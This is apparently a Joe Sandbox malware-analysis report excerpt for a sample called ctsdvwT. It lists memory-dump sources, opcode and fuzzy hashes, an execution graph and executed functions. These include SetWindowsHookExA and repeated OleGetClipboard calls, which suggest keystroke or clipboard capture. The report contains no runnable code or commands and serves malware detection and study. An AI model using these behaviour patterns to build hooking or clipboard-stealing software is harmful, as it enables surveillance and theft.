                                            • Source File: 00000007.00000002.2194142655.0000000000EED000.00000040.00000800.00020000.00000000.sdmp, Offset: 00EED000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_7_2_eed000_ctsdvwT.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 67526475ddc136cc27d5262c8c6e9f9e769c1ca261280307e2220a7a8af6e323
                                            • Instruction ID: 4fe7bf22267baa7edf83e37f1305f1d7cd0b918b112bed2b05ba2cf136211ab7
                                            • Opcode Fuzzy Hash: 67526475ddc136cc27d5262c8c6e9f9e769c1ca261280307e2220a7a8af6e323
                                            • Instruction Fuzzy Hash: 6921507550D3C48FDB12CF24D994715BF72EB46314F28C5EAD8498B6A7C33A980ACB62
                                            Function 00EDD4BF Relevance: .1, Instructions: 56COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000007.00000002.2194081252.0000000000EDD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00EDD000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_7_2_edd000_ctsdvwT.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: be84e5d2ba6eb25d2e30d29f2c5ffdc4cdcd384a79140dda988d9b090738847a
                                            • Instruction ID: 907cee5e6acc8a89b2e0a188b7f592ba09e37e907368928545c021386fb69cc6
                                            • Opcode Fuzzy Hash: be84e5d2ba6eb25d2e30d29f2c5ffdc4cdcd384a79140dda988d9b090738847a
                                            • Instruction Fuzzy Hash: CD110672404240CFCB12CF10D9C4B16BF71FB94318F24C6AAD8450B356C336D456CBA1
                                            Function 00EDD3D3 Relevance: .1, Instructions: 56COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000007.00000002.2194081252.0000000000EDD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00EDD000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_7_2_edd000_ctsdvwT.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: be84e5d2ba6eb25d2e30d29f2c5ffdc4cdcd384a79140dda988d9b090738847a
                                            • Instruction ID: e98926b3a3db327831fa834aea1bdded033e17748649dbcd2e5e388df199d498
                                            • Opcode Fuzzy Hash: be84e5d2ba6eb25d2e30d29f2c5ffdc4cdcd384a79140dda988d9b090738847a
                                            • Instruction Fuzzy Hash: 95110372404240DFCB12CF00D9C4B16BF71FB94328F24C6AAD9090B356C33AE85ACBA2
                                            Function 00EED1CF Relevance: .1, Instructions: 53COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000007.00000002.2194142655.0000000000EED000.00000040.00000800.00020000.00000000.sdmp, Offset: 00EED000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_7_2_eed000_ctsdvwT.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 945d3a080ad63b5e32bcc5b18ec1e97d0272151c1fb78e482730898ede984437
                                            • Instruction ID: b364829fee392a2a6c870231575de244ed384b08687afe4b398073a64e4fc5d2
                                            • Opcode Fuzzy Hash: 945d3a080ad63b5e32bcc5b18ec1e97d0272151c1fb78e482730898ede984437
                                            • Instruction Fuzzy Hash: 8811BB75508284DFCB02CF50C9C4B15BBA1FB88318F24C6A9D9494B2A6C33AD81ACB62
                                            Function 00EDD745 Relevance: .0, Instructions: 45COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000007.00000002.2194081252.0000000000EDD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00EDD000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_7_2_edd000_ctsdvwT.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: a0f15cdd5c395d14a6f5b72883645446dc8c1bbc9cf5e78b5cb07462a9658b5a
                                            • Instruction ID: 83cf4c7b765ed6ba34e8fbd70e2240e04ae716d85633f90596d131da229907d0
                                            • Opcode Fuzzy Hash: a0f15cdd5c395d14a6f5b72883645446dc8c1bbc9cf5e78b5cb07462a9658b5a
                                            • Instruction Fuzzy Hash: 21012B310083409AE7208E15CD84BA7BF9CEF46324F18D5ABED085F386C2399802CAB1
                                            Function 00EDD744 Relevance: .0, Instructions: 36COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000007.00000002.2194081252.0000000000EDD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00EDD000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_7_2_edd000_ctsdvwT.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: b7a84f32d28bc7683566bdb0850d4b6e31844649462a13c6e97e55234e17f2d6
                                            • Instruction ID: 11b4cf6227929b2f83da3bb1eef439887e6ebd5c959445ced7488a215e37bd15
                                            • Opcode Fuzzy Hash: b7a84f32d28bc7683566bdb0850d4b6e31844649462a13c6e97e55234e17f2d6
                                            • Instruction Fuzzy Hash: BDF062714083449AE7208E16DC88BA6FF98EF56734F18C45BED485B386C2799845CAB5

                                            Execution Graph

                                            Execution Coverage:11.6%
                                            Dynamic/Decrypted Code Coverage:92.7%
                                            Signature Coverage:0%
                                            Total number of Nodes:193
                                            Total number of Limit Nodes:22
                                            execution_graph 23813 686e140 23814 686e14b 23813->23814 23815 686e15b 23814->23815 23817 686dbb0 23814->23817 23818 686e190 OleInitialize 23817->23818 23819 686e1f4 23818->23819 23819->23815 23820 68678eb 23821 6867932 23820->23821 23822 6867938 GetModuleHandleW 23820->23822 23821->23822 23823 6867965 23822->23823 23824 686fe28 23825 686fe6c SetWindowsHookExA 23824->23825 23827 686feb2 23825->23827 23911 6868998 23912 6868a00 CreateWindowExW 23911->23912 23914 6868abc 23912->23914 23914->23914 23915 686c7b8 23916 686c760 DuplicateHandle 23915->23916 23918 686c7c7 23915->23918 23917 686c78e 23916->23917 23919 182d01c 23920 182d034 23919->23920 23921 182d08e 23920->23921 23928 6866c34 23920->23928 23932 6868b50 23920->23932 23938 686d2d3 23920->23938 23946 6868b43 23920->23946 23952 6866c25 23920->23952 23956 6866c44 23920->23956 23929 6866c3f 23928->23929 23964 6866c6c 23929->23964 23931 6868c87 23931->23921 23933 6868b76 23932->23933 23934 6866c34 GetModuleHandleW 23933->23934 23935 6868b82 23934->23935 23936 6866c44 2 API calls 23935->23936 23937 6868b97 23936->23937 23937->23921 23939 686d2da 23938->23939 23940 686d361 23939->23940 23942 686d351 23939->23942 23982 686c2ac 23940->23982 23970 686d488 23942->23970 23976 686d478 23942->23976 23943 686d35f 23947 6868b76 23946->23947 23948 6866c34 GetModuleHandleW 23947->23948 23949 6868b82 23948->23949 23950 6866c44 2 API calls 23949->23950 23951 6868b97 23950->23951 23951->23921 23953 6866c31 23952->23953 23954 6866c6c GetModuleHandleW 23953->23954 23955 6868c87 23954->23955 23955->23921 23957 6866c4f 23956->23957 23958 686d361 23957->23958 23960 686d351 23957->23960 23959 686c2ac 2 API calls 23958->23959 23961 686d35f 23959->23961 23962 686d488 2 API calls 23960->23962 23963 686d478 2 API calls 23960->23963 23962->23961 23963->23961 23965 6866c77 23964->23965 23966 6865e44 GetModuleHandleW 23965->23966 23967 6868ce9 23966->23967 23968 6865e54 GetModuleHandleW 23967->23968 23969 6868d57 23967->23969 23968->23969 23972 686d496 23970->23972 23971 686c2ac 2 API calls 23971->23972 23972->23971 23973 686d56e 23972->23973 23989 686d968 23972->23989 23994 686d958 23972->23994 23973->23943 23978 686d496 23976->23978 23977 686c2ac 2 API calls 23977->23978 23978->23977 23979 686d56e 23978->23979 23980 686d958 OleGetClipboard 23978->23980 23981 686d968 OleGetClipboard 23978->23981 23979->23943 23980->23978 23981->23978 23983 686c2b7 23982->23983 23984 686d674 23983->23984 23985 686d5ca 23983->23985 23986 6866c44 OleGetClipboard 23984->23986 23987 686d622 CallWindowProcW 23985->23987 23988 686d5d1 23985->23988 23986->23988 23987->23988 23988->23943 23990 686d987 23989->23990 23991 686da20 23990->23991 23999 686df20 23990->23999 24005 686dedf 23990->24005 23991->23972 23995 686d987 23994->23995 23996 686da20 23995->23996 23997 686df20 OleGetClipboard 23995->23997 23998 686dedf OleGetClipboard 23995->23998 23996->23972 23997->23995 23998->23995 24000 686df28 23999->24000 24001 686df3c 24000->24001 24011 686df58 24000->24011 24022 686df68 24000->24022 24001->23990 24002 686df51 24002->23990 24006 686df05 24005->24006 24007 686df3c 24006->24007 24009 686df58 OleGetClipboard 24006->24009 24010 686df68 OleGetClipboard 24006->24010 24007->23990 24008 686df51 24008->23990 24009->24008 24010->24008 24012 686df68 24011->24012 24013 686df95 24012->24013 24015 686dfd9 24012->24015 24018 686df58 OleGetClipboard 24013->24018 24019 686df68 OleGetClipboard 24013->24019 24014 686df9b 24014->24002 24017 686e059 24015->24017 24033 686e220 24015->24033 24037 686e230 24015->24037 24016 686e077 24016->24002 24017->24002 24018->24014 24019->24014 24023 686df7a 24022->24023 24024 686df95 24023->24024 24026 686dfd9 24023->24026 24031 686df58 OleGetClipboard 24024->24031 24032 686df68 OleGetClipboard 24024->24032 24025 686df9b 24025->24002 24028 686e059 24026->24028 24029 686e220 OleGetClipboard 24026->24029 24030 686e230 OleGetClipboard 24026->24030 24027 686e077 24027->24002 24028->24002 24029->24027 24030->24027 24031->24025 24032->24025 24035 686e245 24033->24035 24036 686e26b 24035->24036 24041 686dcc8 24035->24041 24036->24016 24039 686e245 24037->24039 24038 686dcc8 OleGetClipboard 24038->24039 24039->24038 24040 686e26b 24039->24040 24040->24016 24042 686e2d8 OleGetClipboard 24041->24042 24044 686e372 24042->24044 23828 1870848 23829 187084e 23828->23829 23830 187091b 23829->23830 23832 1871380 23829->23832 23834 187138b 23832->23834 23833 1871490 23833->23829 23834->23833 23837 68658e3 23834->23837 23843 68658f8 23834->23843 23838 686590a 23837->23838 23841 68659bb 23838->23841 23849 686039c 23838->23849 23840 6865981 23854 68603bc 23840->23854 23841->23834 23844 686590a 23843->23844 23845 686039c GetModuleHandleW 23844->23845 23846 68659bb 23844->23846 23847 6865981 23845->23847 23846->23834 23848 68603bc KiUserCallbackDispatcher 23847->23848 23848->23846 23850 68603a7 23849->23850 23858 6866ec0 23850->23858 23867 6866eb1 23850->23867 23851 6865f6a 23851->23840 23855 68603c7 23854->23855 23857 686d8b3 23855->23857 23907 686c304 23855->23907 23857->23841 23859 6866eeb 23858->23859 23876 6865e44 23859->23876 23862 6866f6e 23863 6866f9a 23862->23863 23887 6865e54 23862->23887 23863->23863 23865 6865e44 GetModuleHandleW 23865->23862 23868 6866eeb 23867->23868 23869 6865e44 GetModuleHandleW 23868->23869 23870 6866f52 23869->23870 23871 6866f6e 23870->23871 23874 6865e44 GetModuleHandleW 23870->23874 23875 6867390 GetModuleHandleW 23870->23875 23872 6865e54 GetModuleHandleW 23871->23872 23873 6866f9a 23871->23873 23872->23873 23874->23871 23875->23871 23877 6865e4f 23876->23877 23878 6866f52 23877->23878 23891 686769e 23877->23891 23899 686760f 23877->23899 23878->23862 23878->23865 23881 6867390 23878->23881 23882 68673ab 23881->23882 23884 68673af 23881->23884 23882->23862 23883 68674e9 23883->23862 23884->23883 23885 686769e GetModuleHandleW 23884->23885 23886 686760f GetModuleHandleW 23884->23886 23885->23883 23886->23883 23888 68678f0 GetModuleHandleW 23887->23888 23890 6867965 23888->23890 23890->23863 23892 68676ee 23891->23892 23893 6865e54 GetModuleHandleW 23892->23893 23894 686773a 23893->23894 23895 6865e54 GetModuleHandleW 23894->23895 23898 68677b4 23894->23898 23896 6867788 23895->23896 23897 6865e54 GetModuleHandleW 23896->23897 23896->23898 23897->23898 23898->23878 23900 686761a 23899->23900 23901 6865e54 GetModuleHandleW 23900->23901 23902 686773a 23901->23902 23903 6865e54 GetModuleHandleW 23902->23903 23906 68677b4 23902->23906 23904 6867788 23903->23904 23905 6865e54 GetModuleHandleW 23904->23905 23904->23906 23905->23906 23906->23878 23908 686d8c8 KiUserCallbackDispatcher 23907->23908 23910 686d936 23908->23910 23910->23855

                                            Executed Functions

                                            Function 0187C980 Relevance: 3.5, Strings: 1, Instructions: 2249COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000008.00000002.2258445305.0000000001870000.00000040.00000800.00020000.00000000.sdmp, Offset: 01870000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_8_2_1870000_ctsdvwT.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: ,btq
                                            • API String ID: 0-3970051468
                                            • Opcode ID: 092bd721dd544ad7f8bd144fa2e6dc3c9b4cad80af668f2a9555b091063af6fd
                                            • Instruction ID: 2d50b4af0082f2993710475a5d199cfd2f0709ce8ddc28dcd3af0fcaa5b3e271
                                            • Opcode Fuzzy Hash: 092bd721dd544ad7f8bd144fa2e6dc3c9b4cad80af668f2a9555b091063af6fd
                                            • Instruction Fuzzy Hash: D133FC31D1061A8EDB11EF68C8806ADF7B1FF99300F15C79AD459A7221EB70EAD5CB81
                                            Function 01879638 Relevance: 2.8, Instructions: 2810COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000008.00000002.2258445305.0000000001870000.00000040.00000800.00020000.00000000.sdmp, Offset: 01870000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_8_2_1870000_ctsdvwT.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 9a49bf972a5eee3f825462ea49d29fa961d9cf72d8def768283948c424f2d512
                                            • Instruction ID: 8bfa0272fd1456dfa7b8cbf565ba26ddfb27abe20b532bcdd50f9caedbcb5f38
                                            • Opcode Fuzzy Hash: 9a49bf972a5eee3f825462ea49d29fa961d9cf72d8def768283948c424f2d512
                                            • Instruction Fuzzy Hash: B453E631D10B1A8ACB51EF68C8805ADF7B1FF99300F15D79AE458B7121EB70AAD5CB81
                                            Function 01874AA8 Relevance: .3, Instructions: 266COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000008.00000002.2258445305.0000000001870000.00000040.00000800.00020000.00000000.sdmp, Offset: 01870000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_8_2_1870000_ctsdvwT.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 3cb42a01395861cf7778df5edd99d2857790211770fcdf6a18222fadedd88895
                                            • Instruction ID: e68846e49ea3d1d5ab4814113afe3563c263a42edd93f5c2b0ad929e150a3827
                                            • Opcode Fuzzy Hash: 3cb42a01395861cf7778df5edd99d2857790211770fcdf6a18222fadedd88895
                                            • Instruction Fuzzy Hash: 2AB13A70E002098FDB14CFA9C9857ADBFF2AF88318F148529D859E7294EB74D985CB81
                                            Function 01873E90 Relevance: .2, Instructions: 238COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000008.00000002.2258445305.0000000001870000.00000040.00000800.00020000.00000000.sdmp, Offset: 01870000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_8_2_1870000_ctsdvwT.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: a41ea304b8465933be8b178b7c8d43988cabecb0f08d9fa4deb47c84b8afa27a
                                            • Instruction ID: c4cd5d26fc763131e61db8ef1f75d252a1878af1c458a8ed106ed92d2a872602
                                            • Opcode Fuzzy Hash: a41ea304b8465933be8b178b7c8d43988cabecb0f08d9fa4deb47c84b8afa27a
                                            • Instruction Fuzzy Hash: 31915A70E002099FDF10DFA9D9817ADBBF2BF88314F148129E819E7254EB349985CB92
                                            Function 06868993 Relevance: 1.6, APIs: 1, Instructions: 133COMMON
                                            Download Yara Rule

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 1417 6868993-6868994 1418 6868996-68689fe 1417->1418 1419 6868921-6868945 1417->1419 1420 6868a00-6868a06 1418->1420 1421 6868a09-6868a10 1418->1421 1419->1417 1420->1421 1423 6868a12-6868a18 1421->1423 1424 6868a1b-6868a53 1421->1424 1423->1424 1425 6868a5b-6868aba CreateWindowExW 1424->1425 1426 6868ac3-6868afb 1425->1426 1427 6868abc-6868ac2 1425->1427 1431 6868afd-6868b00 1426->1431 1432 6868b08 1426->1432 1427->1426 1431->1432 1433 6868b09 1432->1433 1433->1433
                                            APIs
                                            • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 06868AAA
                                            Memory Dump Source
                                            • Source File: 00000008.00000002.2267238985.0000000006860000.00000040.00000800.00020000.00000000.sdmp, Offset: 06860000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_8_2_6860000_ctsdvwT.jbxd
                                            Similarity
                                            • API ID: CreateWindow
                                            • String ID:
                                            • API String ID: 716092398-0
                                            • Opcode ID: 96a35a68c7cc92689bb40b1649e28649c842d8b22ed09a0ba445221b12d08010
                                            • Instruction ID: 90411802127e79ffeec37223df20bf1a79cc525bf375434f6fd9ef08320b48ea
                                            • Opcode Fuzzy Hash: 96a35a68c7cc92689bb40b1649e28649c842d8b22ed09a0ba445221b12d08010
                                            • Instruction Fuzzy Hash: 7D5102B1C00349AFDB11CFAAC984ADDBFB5FF49300F24816AE858AB251D7749885CF91
                                            Function 06868998 Relevance: 1.6, APIs: 1, Instructions: 113COMMON
                                            Download Yara Rule

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 1434 6868998-68689fe 1435 6868a00-6868a06 1434->1435 1436 6868a09-6868a10 1434->1436 1435->1436 1437 6868a12-6868a18 1436->1437 1438 6868a1b-6868aba CreateWindowExW 1436->1438 1437->1438 1440 6868ac3-6868afb 1438->1440 1441 6868abc-6868ac2 1438->1441 1445 6868afd-6868b00 1440->1445 1446 6868b08 1440->1446 1441->1440 1445->1446 1447 6868b09 1446->1447 1447->1447
                                            APIs
                                            • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 06868AAA
                                            Memory Dump Source
                                            • Source File: 00000008.00000002.2267238985.0000000006860000.00000040.00000800.00020000.00000000.sdmp, Offset: 06860000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_8_2_6860000_ctsdvwT.jbxd
                                            Similarity
                                            • API ID: CreateWindow
                                            • String ID:
                                            • API String ID: 716092398-0
                                            • Opcode ID: 56533e1d0e624fc74d503446fb9e303193d3061c22f3e161c20fbd03abdf601a
                                            • Instruction ID: 864a839d2b0888bd706f0f3e17631c757fa36e879791589f035af528ed0d2b26
                                            • Opcode Fuzzy Hash: 56533e1d0e624fc74d503446fb9e303193d3061c22f3e161c20fbd03abdf601a
                                            • Instruction Fuzzy Hash: 5641C0B1D00309AFDB14CF9AC984ADEBBB5FF48314F24812AE818BB250D775A945CF91
                                            Function 0686C2AC Relevance: 1.6, APIs: 1, Instructions: 97COMMON
                                            Download Yara Rule

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 1448 686c2ac-686d5c4 1451 686d674-686d694 call 6866c44 1448->1451 1452 686d5ca-686d5cf 1448->1452 1459 686d697-686d6a4 1451->1459 1454 686d622-686d65a CallWindowProcW 1452->1454 1455 686d5d1-686d608 1452->1455 1457 686d663-686d672 1454->1457 1458 686d65c-686d662 1454->1458 1462 686d611-686d620 1455->1462 1463 686d60a-686d610 1455->1463 1457->1459 1458->1457 1462->1459 1463->1462
                                            APIs
                                            • CallWindowProcW.USER32(?,?,?,?,?), ref: 0686D649
                                            Memory Dump Source
                                            • Source File: 00000008.00000002.2267238985.0000000006860000.00000040.00000800.00020000.00000000.sdmp, Offset: 06860000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_8_2_6860000_ctsdvwT.jbxd
                                            Similarity
                                            • API ID: CallProcWindow
                                            • String ID:
                                            • API String ID: 2714655100-0
                                            • Opcode ID: 082d24778911c14d64a075e29d28f566924fede1194fc64d1d400ab35f92a030
                                            • Instruction ID: fd66377f4df19dcb7827dfac4e8da30f20c8cad5321fd86cd7a7b0cf91e93d30
                                            • Opcode Fuzzy Hash: 082d24778911c14d64a075e29d28f566924fede1194fc64d1d400ab35f92a030
                                            • Instruction Fuzzy Hash: 16412DB4A003458FDB54CF9AC488AAEBBF5FF88314F14C459E619AB321D374A840CFA0
                                            Function 0686C7B8 Relevance: 1.6, APIs: 1, Instructions: 93COMMON
                                            Download Yara Rule

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 1465 686c7b8-686c7c5 1466 686c7c7-686c8e6 1465->1466 1467 686c760-686c78c DuplicateHandle 1465->1467 1468 686c795-686c7b2 1467->1468 1469 686c78e-686c794 1467->1469 1469->1468
                                            APIs
                                            • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 0686C77F
                                            Memory Dump Source
                                            • Source File: 00000008.00000002.2267238985.0000000006860000.00000040.00000800.00020000.00000000.sdmp, Offset: 06860000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_8_2_6860000_ctsdvwT.jbxd
                                            Similarity
                                            • API ID: DuplicateHandle
                                            • String ID:
                                            • API String ID: 3793708945-0
                                            • Opcode ID: 1803a5c15d5f3f4963955d9193b8ad3d309594b5e405d813d5f5f04eddf91ad5
                                            • Instruction ID: 7e3b7f4189da48f35b370e5ed3388d627ce4f3cdbc0e8ca17b88f251208a83d6
                                            • Opcode Fuzzy Hash: 1803a5c15d5f3f4963955d9193b8ad3d309594b5e405d813d5f5f04eddf91ad5
                                            • Instruction Fuzzy Hash: F94140B8A44340DFEB019FA8F8496797FBAFB4A700F10D12AE9559B385DB794805CF10
                                            Function 0686E2CC Relevance: 1.6, APIs: 1, Instructions: 76comclipboardCOMMON
                                            Download Yara Rule

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 1482 686e2cc-686e328 1483 686e332-686e370 OleGetClipboard 1482->1483 1484 686e372-686e378 1483->1484 1485 686e379-686e3c7 1483->1485 1484->1485 1490 686e3d7 1485->1490 1491 686e3c9-686e3cd 1485->1491 1493 686e3d8 1490->1493 1491->1490 1492 686e3cf 1491->1492 1492->1490 1493->1493
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000008.00000002.2267238985.0000000006860000.00000040.00000800.00020000.00000000.sdmp, Offset: 06860000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_8_2_6860000_ctsdvwT.jbxd
                                            Similarity
                                            • API ID: Clipboard
                                            • String ID:
                                            • API String ID: 220874293-0
                                            • Opcode ID: a0836cab353cecb35e2decdec5c8161e9d71a8d87bc9298f2a281a9a7c033c3e
                                            • Instruction ID: 28f877112ada0e66764dc8c222ef426ac6e4ae5ca4c2b362f030ec78a8e67400
                                            • Opcode Fuzzy Hash: a0836cab353cecb35e2decdec5c8161e9d71a8d87bc9298f2a281a9a7c033c3e
                                            • Instruction Fuzzy Hash: 8D3143B0D01248DFDB10CFA9CA88BCEBBF1EF48304F248019E144AB3A0D7B45945CB65
                                            Function 0686DCC8 Relevance: 1.6, APIs: 1, Instructions: 74comclipboardCOMMON
                                            Download Yara Rule

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 1494 686dcc8-686e370 OleGetClipboard 1497 686e372-686e378 1494->1497 1498 686e379-686e3c7 1494->1498 1497->1498 1503 686e3d7 1498->1503 1504 686e3c9-686e3cd 1498->1504 1506 686e3d8 1503->1506 1504->1503 1505 686e3cf 1504->1505 1505->1503 1506->1506
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000008.00000002.2267238985.0000000006860000.00000040.00000800.00020000.00000000.sdmp, Offset: 06860000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_8_2_6860000_ctsdvwT.jbxd
                                            Similarity
                                            • API ID: Clipboard
                                            • String ID:
                                            • API String ID: 220874293-0
                                            • Opcode ID: 521af85f89d782327b1ad9527c60a72e9dab374bf6c69bbc7c4d1cf70deb3ddf
                                            • Instruction ID: d7456bde22846224aa0fb318845248d1cba53ffab4f115856834ac99e2165f22
                                            • Opcode Fuzzy Hash: 521af85f89d782327b1ad9527c60a72e9dab374bf6c69bbc7c4d1cf70deb3ddf
                                            • Instruction Fuzzy Hash: 793103B4D0520CDFDB54DF9ACA88B9DBBF5EF48304F248029E504AB390D7B59944CB95
                                            Function 0686FE23 Relevance: 1.6, APIs: 1, Instructions: 68COMMON
                                            Download Yara Rule

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 1507 686fe23-686fe24 1508 686fe26-686fe72 1507->1508 1509 686fe7a-686fe7c 1507->1509 1511 686fe7e-686fe87 1508->1511 1517 686fe74 1508->1517 1509->1511 1512 686fe91-686feb0 SetWindowsHookExA 1511->1512 1513 686fe89-686fe8e 1511->1513 1515 686feb2-686feb8 1512->1515 1516 686feb9-686fed9 1512->1516 1513->1512 1515->1516 1517->1509
                                            APIs
                                            • SetWindowsHookExA.USER32(?,00000000,?,?), ref: 0686FEA3
                                            Memory Dump Source
                                            • Source File: 00000008.00000002.2267238985.0000000006860000.00000040.00000800.00020000.00000000.sdmp, Offset: 06860000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_8_2_6860000_ctsdvwT.jbxd
                                            Similarity
                                            • API ID: HookWindows
                                            • String ID:
                                            • API String ID: 2559412058-0
                                            • Opcode ID: dd3432b712f416f7f4892b96778bb839c2d1d7b258f5fd6d7632107a4037f873
                                            • Instruction ID: a3d0fa748a52b2b0c5bc3a3d8f651bcc5e5ec91e937b8436d487fd28f576b4c0
                                            • Opcode Fuzzy Hash: dd3432b712f416f7f4892b96778bb839c2d1d7b258f5fd6d7632107a4037f873
                                            • Instruction Fuzzy Hash: 00216671C002098FCB14DFAAE844AEEBFF5EB48310F14841AE559A7251C774A940CFA0
                                            Function 0686C6F0 Relevance: 1.6, APIs: 1, Instructions: 63COMMON
                                            Download Yara Rule

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 1520 686c6f0-686c75d 1521 686c760-686c78c DuplicateHandle 1520->1521 1522 686c795-686c7b2 1521->1522 1523 686c78e-686c794 1521->1523 1523->1522
                                            APIs
                                            • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 0686C77F
                                            Memory Dump Source
                                            • Source File: 00000008.00000002.2267238985.0000000006860000.00000040.00000800.00020000.00000000.sdmp, Offset: 06860000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_8_2_6860000_ctsdvwT.jbxd
                                            Similarity
                                            • API ID: DuplicateHandle
                                            • String ID:
                                            • API String ID: 3793708945-0
                                            • Opcode ID: d69ee81eb83e61cc14e769603956bcaf9496b3a6a5a136afa369dee14349957f
                                            • Instruction ID: 201066db2a344a482f519a18d4250bf1174e84c71b78d17af8e5a35c83f42ec4
                                            • Opcode Fuzzy Hash: d69ee81eb83e61cc14e769603956bcaf9496b3a6a5a136afa369dee14349957f
                                            • Instruction Fuzzy Hash: 4221E2B5D002489FDB50CFAAD984AEEBFF5FB48310F14841AE958A7350D378A944CFA0
                                            Function 0686C6F8 Relevance: 1.6, APIs: 1, Instructions: 62COMMON
                                            Download Yara Rule

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 1526 686c6f8-686c75d 1527 686c760-686c78c DuplicateHandle 1526->1527 1528 686c795-686c7b2 1527->1528 1529 686c78e-686c794 1527->1529 1529->1528
                                            APIs
                                            • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 0686C77F
                                            Memory Dump Source
                                            • Source File: 00000008.00000002.2267238985.0000000006860000.00000040.00000800.00020000.00000000.sdmp, Offset: 06860000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_8_2_6860000_ctsdvwT.jbxd
                                            Similarity
                                            • API ID: DuplicateHandle
                                            • String ID:
                                            • API String ID: 3793708945-0
                                            • Opcode ID: 816bf2c3800c2334c3b6b1664fa5bf157f3171e993fae032c6a9a4a204c58255
                                            • Instruction ID: 05c69a2696242a0fc70c603f330988529bdba80509af2d085d82e6d7a092ed60
                                            • Opcode Fuzzy Hash: 816bf2c3800c2334c3b6b1664fa5bf157f3171e993fae032c6a9a4a204c58255
                                            • Instruction Fuzzy Hash: 4321E4B5D002089FDB10CFAAD984ADEBBF8FB48310F14841AE958A7310D378A944CFA0
                                            Function 0686FE28 Relevance: 1.6, APIs: 1, Instructions: 57COMMON
                                            Download Yara Rule
                                            APIs
                                            • SetWindowsHookExA.USER32(?,00000000,?,?), ref: 0686FEA3
                                            Memory Dump Source
                                            • Source File: 00000008.00000002.2267238985.0000000006860000.00000040.00000800.00020000.00000000.sdmp, Offset: 06860000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_8_2_6860000_ctsdvwT.jbxd
                                            Similarity
                                            • API ID: HookWindows
                                            • String ID:
                                            • API String ID: 2559412058-0
                                            • Opcode ID: a62f5b53de222f8c18719d4e3108363dbb71a4251dabff1b0110d0e4b6a00cb3
                                            • Instruction ID: 319d80fe19d58b8d3ddb9dd56a09ec0d532b4ddd4b07456585196050d8bcac34
